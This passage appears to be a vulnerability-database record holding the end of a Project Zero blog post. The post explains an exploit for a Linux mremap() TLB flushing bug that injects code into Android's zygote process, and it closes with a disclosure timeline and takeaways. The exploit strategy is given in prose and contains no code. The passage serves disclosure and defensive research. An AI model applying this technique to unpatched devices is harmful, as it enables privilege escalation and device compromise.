VM_MAX_READAHEAD, which is 128KiB) around a page fault from disk. This is implemented in filemap_fault() by calling into do_async_mmap_readahead() / do_sync_mmap_readahead(). An attacking process can simply opt out of this for its own accesses, but it is also desirable to suppress this behavior for accesses coming from other processes that might be executing code from other pages in the victim file.\n\n** \n**\n\nFor this reason, the PoC first evicts the victim page, then accesses all other pages in the victim file through a mapping with MADV_RANDOM to reduce the probability that accesses to those other pages trigger readahead logic: When a page being accessed is present in RAM, synchronous readahead won't happen; and when the page being accessed with a minor fault (i.e. the page is present in the page cache, but no corresponding page table entry exists yet) is not marked as PG_readahead, asynchronous readahead won't happen either.\n\n## Picking a victim page\n\nMy exploit targets a victim page in the library /system/lib64/libandroid_runtime.so that contains the function com_android_internal_os_Zygote_nativeForkAndSpecialize(). This function is executed in the context of the zygote process whenever an app process needs to be launched \u2014 in other words, it shouldn't run very often on an idle device, meaning that we can evict it and then have time to trigger the bug \u2014, and we can trigger its execution by launching an isolated service, so we can easily cause its execution immediately after successfully triggering the bug. The zygote process has the CAP_SYS_ADMIN capability (and is permitted to use it), and because its job is to fork off children that become app processes and system_server, it has access to the contexts of system_server and every app.\n\n** \n**\n\nTo demonstrate that the code injection into the zygote is working, the injected code reads its own SELinux context and then overwrites the hostname with that string (using sethostname()).\n\n## Putting it together\n\nThe exploit is packaged in an app that, when you press the \"run\" button, first uses the code in eviction.c to flush the victim page in /system/lib64/libandroid_runtime.so from the page cache; afterwards, the code in sched_test.c is used to trigger the mremap bug and overwrite the victim page. If sched_test.c reports that it has successfully located and overwritten the targeted code page, the Java code launches the isolated app TriggerService to trigger execution of com_android_internal_os_Zygote_nativeForkAndSpecialize(); otherwise, the attack is restarted.\n\n** \n**\n\nsched_test.c executes the following threads:\n\n * idle_worker(): on core 4, with SCHED_IDLE priority; is moved to core 3 during the attack\n\n * spinner(): on core 4, with normal priority\n\n * nicer_spinner(): on core 3, with normal priority\n\n * read_worker(): on core 5, with normal priority\n\n * main(): on core 6, with normal priority\n\n** \n**\n\nThe following screenshot shows the running exploit, which has performed a few exploit attempts already, but hasn't managed to visibly trigger the bug yet:\n\n \n\n\n\n\n** \n**\n\nIn the next screenshot, the exploit has managed to read data through the stale TLB entry, but still hasn't managed to locate and overwrite the victim page:\n\n \n\n\n\n\n** \n**\n\nIn the third screenshot, the exploit has succeeded:\n\n \n\n\n\n\n## Timeline\n\nThis bug [was reported](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1695>) to the Linux kernel on 2018-10-12.\n\nA fix [was committed and made public](<https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=eb66ae030829605d61fbef1909ce310e29f78821>) six days later, on 2018-10-18.\n\nTwo days after that, on 2018-10-20, new upstream stable kernels were released on the branches [4.9](<https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.9.135>), [4.14](<https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.14.78>) and [4.18](<https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.18.16>).\n\nOn 2018-10-29, we [published](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1695#c4>) the bug report.\n\nOn 2018-11-10, an upstream backport on the 4.4 branch was [released](<https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.4.163>).\n\nOn 2018-11-14, we [published](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1695#c5>) the exploit described in this blogpost.\n\n** \n**\n\nIt took more than two months for the upstream kernel change to make its way to user devices; writing an exploit for this bug took far less time.\n\n# Conclusion\n\nThere isn't really an overarching conclusion here, but some takeaways:\n\n \n\n\n * Bugs in TLB flushing logic can be exploitable and lead to system compromise from unprivileged userspace.\n\n * When trying to exploit a use-after-free of a physical page on Linux, keep in mind that the page allocator will try to avoid changing the migration types of pages, so usually movable pages (anonymous userspace memory and page cache) will be reused as movable pages, and unmovable pages (normal kernel memory) will be reused as unmovable pages.\n\n * Knowing a bit about the scheduler, and in particular preemption, can be very helpful for widening kernel race windows. Linux exposes fairly powerful control over scheduling to unprivileged userspace.\n\n * Android takes months to ship an upstream kernel security fix to users; it would be nice if that was significantly faster.\n", "modified": "2019-01-17T00:00:00", "published": "2019-01-17T00:00:00", "id": "GOOGLEPROJECTZERO:60F2E118E85CB34AAEEAED9DE88D51AF", "href": "https://googleprojectzero.blogspot.com/2019/01/taking-page-from-kernels-book-tlb-issue.html", "type": "googleprojectzero", "title": "\nTaking a page from the kernel's book: A TLB issue in mremap()\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}]}